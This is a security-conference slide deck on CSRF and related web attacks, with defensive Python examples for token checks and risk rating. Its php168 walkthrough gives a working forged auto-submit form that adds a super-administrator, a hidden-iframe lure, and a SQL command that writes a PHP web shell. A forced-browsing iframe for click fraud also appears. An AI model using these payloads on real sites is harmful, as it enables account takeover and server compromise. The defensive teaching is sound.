TAIS 台灣學術資訊安全國際研討會 (Taiwan Academic Information Security International Conference)
CSRF (Cross-Site Request Forgery) Attack Analysis and Defense
Cross-Site Request Forgery Threat and Mitigation
夏克強, Senior Technical Consultant, 麟瑞科技 (Ringline Technology); CISSP, CHFI, CEH
PowerPoint presentation (extracted slide text)
Why Web Applications Are Vulnerable
Improved commercial or in-house application access to information means improved access for hackers?
[Slide diagram: a layered stack of Network, Operating Systems, Web Servers, Application Servers and Database Servers (the databases hold personal data, transaction records and customer data: Customer Info, Business Data, Transaction Info). A network firewall and IDS/IPS sit in front of the stack, but the web application (Web AP) layer, where "75% of attacks are concentrated", is hit directly by SQL Injection, Parameter Tampering, XSS, etc. Notes on the Web AP layer: applications not yet live are rushed into production; applications already live are years old.]
OWASP Top Ten
[Slide diagram: mapping from the 2007 to the 2010 OWASP Top 10, marking entries added (+), removed (-) and unchanged (=).]
Cybercrime threat: cyber pickpocketing
BEBLOH, where the malware went beyond "traditional" keylogging: it not only stole credit card information but also accessed the account and transferred funds to another account.
Cross-Site Scripting
Reflected XSS, Stored XSS (aka Persistent XSS). Samy worm. Web sites compromised: FBI.gov, CNN.com, Time.com, eBay, Yahoo, Apple Computer, Microsoft, ZDNet, Wired, and Newsbytes.
Top vulnerable weakness in recent years. Web sites are vulnerable to XSS wherever user input is echoed back: search page, forum, comments, login page, etc.
Cross-Site Scripting attacks: hoaxes; stealing the user's session ID and cookies; almost full control of the victim's browser, such as port scanning, keylogging and sending requests on behalf of the client.
Stored Cross-Site Scripting
[Slide diagram of an application with a stored XSS vulnerability; the application's Custom Code sits in front of its business functions (Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions).]
1. Attacker sets the trap ("update my profile"): the attacker enters a malicious script into a web page that stores the data on the server.
2. Victim views the page and sees the attacker's profile; the script runs inside the victim's browser with full access to the DOM and cookies.
3. The script silently sends the victim's session cookie to the attacker.
Stored & Reflected XSS
Stored XSS guarantees that victim users will already be accessing the application at the time the attack strikes.
Reflected XSS may try to engineer this situation by persuading the user to log in.
Reflected XSS must use some means of inducing users to visit the attacker's crafted URL; a phishing attack that offers a link to the attacker's own malicious web server is likely to be suspected as a scam. Stored XSS avoids this requirement.
Stored XSS (aka Persistent XSS) is therefore more serious than reflected XSS.
Clickjacking (點擊綁架)
Clickjacking is an attempt by the attacker to hijack the user's mouse clicks, so that the user unknowingly clicks a link or button the attacker has carefully laid out (typically in a transparent iframe over a decoy page).
Clickjacking can be seen as an advanced phishing technique. Clickjacking (session riding) resembles CSRF: both make the user act without being aware of it, and combining clickjacking with CSRF amplifies the attack.
Clickjacking Defense
Use Firefox NoScript's ClearClick feature to block iframe execution, or disable JavaScript.
Frame busting (anti-framing) for your own sites: <script>if (top != self) top.location = location</script>. Caveat: script-only frame busting can be defeated (for example by framing the page with scripting disabled, or by trapping the redirect), so treat it as defense in depth rather than the primary control.
IE8 added a defense against clickjacking: the response header X-FRAME-OPTIONS: DENY or X-FRAME-OPTIONS: SAMEORIGIN. The header has since been adopted by all major browsers.
Forced Browsing
<html><body>blank page<iframe src="http://www.google.com.tw/search?hl=zh-TW&q=taiwan+taipei" height="0" width="0"></iframe></body></html>
Application: advertising revenue fraud. Technique: thousands of different people unknowingly issue the hidden request, from different IP addresses, which evades the click-fraud checks.
Cross-Site Request Forgery
CSRF example: one step further, lure you into clicking a link.
Suppose the shopping site you visit is http://www.hacker.net and you buy a product; the request the site uses is http://www.hacker.net/buy.php?item=computer&quantity=1. This is a normal HTTP request: the item is "computer" and the quantity is 1, and the site records the item and quantity in the user's account. If a hacker knows how the http://www.hacker.net shopping site works, he can forge a similar HTTP request, http://www.hacker.net/buy.php?item=computer&quantity=1000, with item "computer" but quantity 1000. If the target user accidentally visits this link while logged in to the site, his account will record a purchase of 1000 computers. The browser attaches the user's session cookie to the forged request automatically, so the site cannot tell that the user never intended it.
CSRF attack on php168
(The following walkthrough is excerpted from www.haik8.com.)
The page for adding a site administrator is:
http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember
Its form (labels translated):
<form name="form1" method="post" action="index.php?lfj=member&action=addmember">
  <tr class="head"><td colspan="2">Add new user</td></tr>
  <tr bgcolor="#FFFFFF"><td width="37%">Account:</td><td width="63%"><input type="text" name="postdb[username]"></td></tr>
  <tr bgcolor="#FFFFFF"><td width="37%">Password:</td><td width="63%"><input type="password" name="postdb[passwd]"></td></tr>
  <tr bgcolor="#FFFFFF"><td width="37%">Repeat password:</td><td width="63%"><input type="password" name="postdb[passwd2]"></td></tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">User group: <span help=1>Only the super administrator and the creator can add a new super administrator; only the super administrator, the founder and front-end administrators can add a new front-end administrator</span></td>
    <td width="63%"><select name='postdb[groupid]'>
      <option value='' selected>Existing user groups</option>
      <option value='2'>Guest group</option>
      <option value='3'>Super administrator</option>
      <option value='4'>Front-end administrator</option>
      <option value=''>--+ System groups above, member groups below +--</option>
      <option value='8'>Ordinary member</option>
      <option value='9'>Advanced member</option>
    </select></td>
  </tr>
  <tr bgcolor="#FFFFFF"><td width="37%">Email:</td><td width="63%"><input type="text" name="postdb[email]"></td></tr>
  <tr bgcolor="#FFFFFF"><td width="37%"></td><td width="63%"><input type="submit" name="Submit" value="Submit"></td></tr>
</form>
The hacker modifies the code; the modified page submits the form as soon as it loads, pre-selecting group 3 (super administrator):
<html><body onload="document.form1.submit()">
<form name="form1" method="post" action="http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember">
  <input type="hidden" name="postdb[username]" value='樱花浪子'>
  <input type="hidden" name="postdb[passwd]" value='nohack'>
  <input type="hidden" name="postdb[passwd2]" value='nohack'>
  <select name='postdb[groupid]'><option value='3' selected></option></select>
</form>
</body></html>
Uploading this page gives the path http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm. If the administrator visits this page while logged in to the front end or back end, a super administrator with username "樱花浪子" and password "nohack" is added. The request succeeds because the administrator's browser attaches his session cookie automatically and the add-member form carries no anti-CSRF token.
But that would display the "administrator added successfully" message. To hide it, make an image "Trojan": a page that loads the auto-submitting form in a zero-size iframe and shows only a picture:
<html><body>
<iframe src="http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm" width="0" height="0"></iframe>
<img src="/Article/UploadPic/2010-4/2010417144022600.jpg">
</body></html>
Uploading it gives the path special/5_20090426220451_PYwLh.jpg, i.e. http://192.168.0.3/php168/upload_files/special/5_20090426220451_PYwLh.jpg.
Then execute:
SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'C:\\AppServ\\www\\php168\\nohack.php'
Check: it shows the web shell has been written!!
CSRF, Referer and X-Header Examples
Calendar system example: http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308
Forcing the victim to open a specific date in the calendar:
<a href='http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20101016'>Click me for a discount</a>
Clickjacking and CSRF reinforce each other: load the target in an iframe with opacity 30% over the decoy page.
Countermeasures against CSRF
CSRF Preventions
Insert custom random tokens into every form and URL: store a single token in the session and add it to all forms and links.
Hidden field: <input name="token" value="687965fdfaew87agrde" type="hidden"/>
Single-use URL: /accounts/687965fdfaew87agrde
Form token: /accounts?auth=687965fdfaew87agrde ...
(Caveat: a token carried in the URL leaks through the Referer header, browser history and server logs, so prefer the hidden form field and keep state-changing actions on POST.)
For sensitive data or value transactions, re-authenticate or use transaction signing.
Verify the Referer header, but XHR can break it (and proxies or privacy settings may strip it, so its absence alone is not proof of forgery).
Verify a custom X-header. It is more effective than the Referer header because of the same-origin policy: a cross-site <img>, <form> or <a> cannot add custom headers, and a cross-origin XHR that tries to is subject to a CORS preflight.
Legal example:
GET /auth/[email protected] HTTP/1.1
Host: social.site
X-CSRF: 1
Illegal example:
<html><img src=http://social.site/auth/update_profile.cgi?[email protected]></html>
which the browser turns into
GET /auth/[email protected] HTTP/1.1
Host: social.site
(no X-CSRF header, so the server rejects it)
Ensure that there are no XSS vulnerabilities in your application: a script injected into the same origin can read the token and set the custom header, defeating both defenses.
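The token, Referer/Origin and custom-header checks from the prevention slides, applied to the kinds of forged request shown earlier (the buy.php quantity=1000 link and the auto-submitting php168 form). This is an added example, not code from the presentation or from php168; the endpoint paths, the origin http://social.site, the in-memory session store and the sample requests are assumptions constructed here for illustration.

```python
# Added example (not code from the presentation): a server-side model of the
# CSRF checks the slides list, run against constructed requests. The endpoint
# paths, the site origin "http://social.site" and the in-memory session store
# are assumptions made here for illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://social.site"                         # assumed app origin
STATE_CHANGING = {"/auth/update_profile.cgi", "/buy.php"}  # assumed endpoints


@dataclass
class Session:
    user: str
    # "store a single token in the session and add it to all forms and links"
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)   # form fields or query string
    cookies: dict = field(default_factory=dict)  # attached by the browser automatically


SESSIONS: dict[str, Session] = {}


def login(user: str) -> str:
    """Create a session; returns the session id the browser stores as a cookie."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = Session(user)
    return sid


def hidden_token_field(sid: str) -> str:
    """The hidden field the server embeds in every form it renders."""
    return f'<input name="token" value="{SESSIONS[sid].csrf_token}" type="hidden"/>'


def _same_origin(header_value: str) -> bool:
    p = urlsplit(header_value)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def check_csrf(req: Request) -> tuple[bool, str]:
    """Return (allowed, reason) for a request that arrived with the browser's cookies."""
    session = SESSIONS.get(req.cookies.get("sid", ""))
    if session is None:
        return False, "no session"
    if req.path not in STATE_CHANGING:
        return True, "not state-changing"
    # 1. Origin/Referer: reject when present and foreign. Absence is tolerated
    #    (proxies and privacy settings strip it), so the checks below must still pass.
    for name in ("Origin", "Referer"):
        if name in req.headers and not _same_origin(req.headers[name]):
            return False, f"foreign {name}: {req.headers[name]}"
    # 2. Custom header: <img>, <form> and <a> cannot add one, and a cross-origin
    #    XHR that adds it triggers a CORS preflight this server never approves.
    if req.headers.get("X-CSRF") == "1":
        return True, "custom header present"
    # 3. Session-bound token from the form or URL, compared in constant time.
    supplied = req.params.get("token", "")
    if supplied and hmac.compare_digest(supplied, session.csrf_token):
        return True, "valid token"
    return False, "missing or wrong token"


def run_scenarios() -> dict[str, bool]:
    """Constructed traffic: legitimate requests and forgeries, keyed by scenario."""
    victim, attacker = login("victim"), login("attacker")
    jar = {"sid": victim}  # the victim's browser sends this cookie with every request
    cases = {
        # normal purchase: the form rendered by the site carries the session token
        "legit_form_post": Request("POST", "/buy.php", {"Referer": SITE_ORIGIN + "/cart"},
            {"item": "computer", "quantity": "1", "token": SESSIONS[victim].csrf_token}, jar),
        # same-origin XHR that sets the custom header (the slide's "legal example")
        "legit_xhr_header": Request("GET", "/auth/update_profile.cgi",
            {"Origin": SITE_ORIGIN, "X-CSRF": "1"}, {"email": "me@social.site"}, jar),
        # <img src=...> on the attacker's page (the slide's "illegal example")
        "forged_img_get": Request("GET", "/auth/update_profile.cgi",
            {"Referer": "http://attacker.example/page.html"}, {"email": "x@attacker.example"}, jar),
        # php168-style auto-submitting form, served with no Referer at all
        "forged_autosubmit_post": Request("POST", "/buy.php", {},
            {"item": "computer", "quantity": "1000"}, jar),
        # attacker replays a token from his own session: not bound to the victim's
        "forged_with_attacker_token": Request("POST", "/buy.php", {},
            {"item": "computer", "quantity": "1000", "token": SESSIONS[attacker].csrf_token}, jar),
        # an ordinary page view needs no token
        "plain_get": Request("GET", "/index.php", {}, {}, jar),
    }
    return {name: check_csrf(r)[0] for name, r in cases.items()}


if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name:28s} {'allowed' if ok else 'REJECTED'}")
```

The order of the checks matters: a foreign Origin or Referer is rejected before the token is even looked at, the custom header is accepted only because nothing but same-origin script can set it, and the token is compared with `hmac.compare_digest` so the comparison does not leak through timing.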
Ratproxy
Semi-automatic web application security assessment tool for XSS and CSRF.
Findings should be validated by manual testing and analysis where appropriate; not all of the issues reported necessarily correspond to actual security flaws.
Microsoft Threat Modeling
Threats (STRIDE): Spoofing identity; Tampering with data (integrity); Repudiability; Information disclosure; Denial of service; Elevation of privilege.
Rating (DREAD): Damage potential; Reproducibility; Exploitability; Affected users; Discoverability.
Process:
1. Identify assets
2. Create an architecture overview
3. Decompose the application
4. Identify the threats
5. Document the threats
6. Rate the threats
OWASP Risk Methodology
[Slide: CSRF Rating Example]
[Slide: CVSS (Metrics View)]
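The rating step the slides only name, carried out on the php168 CSRF attack above with the two schemes they list: DREAD (from Microsoft threat modeling) and the OWASP Risk Rating Methodology's likelihood and impact averages. This is an added example, not the speaker's rating. The factor names, the 1-10 and 0-9 scales and the OWASP severity table are the published ones; the scores assigned to the php168 threat are this example's own assumptions.

```python
# Added example (not from the presentation): scoring the php168 CSRF threat
# with DREAD and with the OWASP Risk Rating Methodology. The factor names and
# scales are the published ones; the scores given to php168 below are assumed.

# DREAD: five factors scored 1-10, rating = average.
DREAD_FACTORS = ("damage_potential", "reproducibility", "exploitability",
                 "affected_users", "discoverability")

# OWASP: eight likelihood factors (threat agent + vulnerability) and eight
# impact factors (technical + business), each scored 0-9, averaged per group.
LIKELIHOOD_FACTORS = ("skill_level", "motive", "opportunity", "size",
                      "ease_of_discovery", "ease_of_exploit", "awareness",
                      "intrusion_detection")
IMPACT_FACTORS = ("loss_of_confidentiality", "loss_of_integrity",
                  "loss_of_availability", "loss_of_accountability",
                  "financial_damage", "reputation_damage", "non_compliance",
                  "privacy_violation")

# OWASP overall severity table, indexed by (likelihood level, impact level).
SEVERITY = {
    ("HIGH", "HIGH"): "CRITICAL", ("HIGH", "MEDIUM"): "HIGH", ("HIGH", "LOW"): "MEDIUM",
    ("MEDIUM", "HIGH"): "HIGH", ("MEDIUM", "MEDIUM"): "MEDIUM", ("MEDIUM", "LOW"): "LOW",
    ("LOW", "HIGH"): "MEDIUM", ("LOW", "MEDIUM"): "LOW", ("LOW", "LOW"): "NOTE",
}


def _average(scores, factors, lo, hi):
    """Average of the named factors, refusing missing or out-of-range scores."""
    missing = [f for f in factors if f not in scores]
    if missing:
        raise ValueError(f"missing factors: {missing}")
    bad = [f for f in factors if not lo <= scores[f] <= hi]
    if bad:
        raise ValueError(f"scores outside {lo}..{hi}: {bad}")
    return sum(scores[f] for f in factors) / len(factors)


def dread_rating(scores):
    return _average(scores, DREAD_FACTORS, 1, 10)


def owasp_level(score):
    """OWASP likelihood/impact levels: 0 to <3 LOW, 3 to <6 MEDIUM, 6 to 9 HIGH."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


def owasp_risk(likelihood_scores, impact_scores):
    likelihood = _average(likelihood_scores, LIKELIHOOD_FACTORS, 0, 9)
    impact = _average(impact_scores, IMPACT_FACTORS, 0, 9)
    l_level, i_level = owasp_level(likelihood), owasp_level(impact)
    return {"likelihood": likelihood, "impact": impact,
            "likelihood_level": l_level, "impact_level": i_level,
            "severity": SEVERITY[(l_level, i_level)]}


# Assumed scores for the php168 attack: one click by a logged-in administrator
# creates a super-administrator account that is then used to drop a web shell.
PHP168_DREAD = {"damage_potential": 9, "reproducibility": 9, "exploitability": 8,
                "affected_users": 6, "discoverability": 7}
PHP168_LIKELIHOOD = {"skill_level": 5, "motive": 9, "opportunity": 7, "size": 9,
                     "ease_of_discovery": 7, "ease_of_exploit": 5, "awareness": 9,
                     "intrusion_detection": 8}
PHP168_IMPACT = {"loss_of_confidentiality": 9, "loss_of_integrity": 7,
                 "loss_of_availability": 7, "loss_of_accountability": 9,
                 "financial_damage": 7, "reputation_damage": 5,
                 "non_compliance": 5, "privacy_violation": 7}


def rate_php168_csrf():
    """Both ratings for the assumed php168 scores."""
    return {"dread": dread_rating(PHP168_DREAD),
            "owasp": owasp_risk(PHP168_LIKELIHOOD, PHP168_IMPACT)}


if __name__ == "__main__":
    print(rate_php168_csrf())
```

With the assumed scores the DREAD average is 7.8 and the OWASP likelihood (7.375) and impact (7.0) both land in HIGH, which the severity table maps to CRITICAL; changing any factor and re-running shows how sensitive the verdict is to the intrusion-detection and awareness scores, which is where a WAF or logging actually moves the number.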
Obstacles for Code Review (or Scanners)
• Can't provide immediate protection.
• Web applications change frequently; in many cases the application changes before a full review cycle has been completed.
• The source code is not readily "available" or "understood".
• Is there enough MIS staff and time to do the re-coding?
• Manual code fixes are only as good as the developer.
• Attacks (again, especially web attacks) also change frequently.
• No correlation capability across multiple services.
• Can't track the actual user who launches the attacks, or the attack patterns.
• Suitable for the development phase, not for the production phase.
• Suitable for the development phase, not for the design phase (only resolved by risk analysis).
• Slow response to compliance requirements.
• Can't protect web servers and back-end database servers.
• No web site cloaking, such as anti-Google-hacking.
• Can't provide additional insight into the requests that write to the database or are reached only through transactions.
Obstacles for WAFs
• Suitable for the production phase, not for the development phase.
• Suitable for the development phase, not for the design phase (only resolved by risk analysis).
• Lack of logical-flaw detection (only resolved by human code review): the application does something insecure by design and the WAF sees only well-formed traffic.
• Can't accurately correct application flaws.
• The WAF itself could go down (fail-open or fail-closed).